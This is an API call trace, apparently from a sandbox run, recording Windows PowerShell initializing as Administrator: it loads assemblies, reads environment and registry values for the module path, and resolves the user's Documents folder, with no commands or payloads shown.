	[0627.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0627.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0627.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0627.060] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0632.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0632.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0632.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0632.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0634.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0634.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0634.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0634.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0634.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0634.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0634.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0634.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0634.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0634.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0638.260] SetConsoleCtrlHandler (HandlerRoutine=0x29668dc, Add=1) returned 1
	[0640.279] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0640.281] CoCreateGuid (in: pguid=0x14de50 | out: pguid=0x14de50*(Data1=0x541f3e97, Data2=0x46a4, Data3=0x4de5, Data4=([0]=0x9f, [1]=0x37, [2]=0x4f, [3]=0xce, [4]=0x4c, [5]=0xfa, [6]=0x55, [7]=0xed))) returned 0x0
	[0640.283] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0640.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.283] CoTaskMemFree (pv=0x1b7c98b0) 
	[0645.440] WinSqmIsOptedIn () returned 0x0
	[0645.441] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0645.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.441] CoTaskMemFree (pv=0x1b7c98b0) 
	[0645.442] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0645.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.442] CoTaskMemFree (pv=0x1b7c98b0) 
	[0645.442] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0645.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.442] CoTaskMemFree (pv=0x1b7c98b0) 
	[0645.443] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0645.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.443] CoTaskMemFree (pv=0x1b7c98b0) 
	[0645.444] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0645.444] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.444] CoTaskMemFree (pv=0x1b7c98b0) 
	[0645.445] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0645.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.445] CoTaskMemFree (pv=0x1b7c98b0) 
	[0645.445] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0645.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.446] CoTaskMemFree (pv=0x1b7c98b0) 
	[0645.446] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0645.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.446] CoTaskMemFree (pv=0x1b7c98b0) 
	[0645.448] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0645.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.448] CoTaskMemFree (pv=0x1b7c98b0) 
	[0645.453] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0645.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.453] CoTaskMemFree (pv=0x1b7c98b0) 
	[0645.454] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0645.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.454] CoTaskMemFree (pv=0x1b7c98b0) 
	[0645.454] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0645.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.454] CoTaskMemFree (pv=0x1b7c98b0) 
	[0652.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0652.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0652.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0652.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.482] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0654.482] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0654.482] CoTaskMemFree (pv=0x1b7c98b0) 
	[0654.484] CoTaskMemAlloc (cb=0xcc) returned 0x1b7da200
	[0654.484] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7da200, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0654.484] CoTaskMemFree (pv=0x1b7da200) 
	[0654.484] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d9c8 | out: phkResult=0x14d9c8*=0x2d8) returned 0x0
	[0654.484] RegQueryValueExW (in: hKey=0x2d8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d94c, lpData=0x0, lpcbData=0x14d948*=0x0 | out: lpType=0x14d94c*=0x2, lpData=0x0, lpcbData=0x14d948*=0x6c) returned 0x0
	[0654.484] CoTaskMemAlloc (cb=0x70) returned 0x28fdf0
	[0654.484] RegQueryValueExW (in: hKey=0x2d8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d91c, lpData=0x28fdf0, lpcbData=0x14d918*=0x6c | out: lpType=0x14d91c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x14d918*=0x6c) returned 0x0
	[0654.484] CoTaskMemFree (pv=0x28fdf0) 
	[0654.484] CoTaskMemAlloc (cb=0xcc) returned 0x1b7da200
	[0654.484] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b7da200, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0654.484] CoTaskMemFree (pv=0x1b7da200) 
	[0654.484] CoTaskMemAlloc (cb=0xcc) returned 0x1b7da200
	[0654.484] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7da200, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0654.485] CoTaskMemFree (pv=0x1b7da200) 
	[0654.488] RegCloseKey (hKey=0x2d8) returned 0x0
	[0654.488] CoTaskMemAlloc (cb=0xcc) returned 0x1b7da200
	[0654.488] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7da200, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0654.488] CoTaskMemFree (pv=0x1b7da200) 
	[0654.489] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d9c8 | out: phkResult=0x14d9c8*=0x2d8) returned 0x0
	[0654.489] RegQueryValueExW (in: hKey=0x2d8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d94c, lpData=0x0, lpcbData=0x14d948*=0x0 | out: lpType=0x14d94c*=0x0, lpData=0x0, lpcbData=0x14d948*=0x0) returned 0x2
	[0654.489] RegCloseKey (hKey=0x2d8) returned 0x0
	[0654.495] CoTaskMemAlloc (cb=0x20c) returned 0x2e19b0
	[0654.496] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2e19b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0654.497] CoTaskMemFree (pv=0x2e19b0) 
	[0654.497] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d550, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0654.498] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0654.506] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0654.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.506] CoTaskMemFree (pv=0x1b7c98b0) 
	[0654.508] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0654.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.508] CoTaskMemFree (pv=0x1b7c98b0) 
	[0654.512] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0654.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.512] CoTaskMemFree (pv=0x1b7c98b0) 
	[0654.513] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0654.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.513] CoTaskMemFree (pv=0x1b7c98b0) 
	[0654.514] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d7b8 | out: phkResult=0x14d7b8*=0x2f4) returned 0x0
	[0654.515] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x14d7cc, lpData=0x0, lpcbData=0x14d7c8*=0x0 | out: lpType=0x14d7cc*=0x1, lpData=0x0, lpcbData=0x14d7c8*=0x74) returned 0x0
	[0654.515] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x14d73c, lpData=0x0, lpcbData=0x14d738*=0x0 | out: lpType=0x14d73c*=0x1, lpData=0x0, lpcbData=0x14d738*=0x74) returned 0x0
	[0654.515] CoTaskMemAlloc (cb=0x78) returned 0x28fdf0
	[0654.515] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x14d70c, lpData=0x28fdf0, lpcbData=0x14d708*=0x74 | out: lpType=0x14d70c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d708*=0x74) returned 0x0
	[0654.515] CoTaskMemFree (pv=0x28fdf0) 
	[0654.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0654.515] SetErrorMode (uMode=0x1) returned 0x1
	[0654.516] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d690 | out: lpFileInformation=0x14d690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0654.516] SetErrorMode (uMode=0x1) returned 0x1
	[0654.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0654.516] SetErrorMode (uMode=0x1) returned 0x1
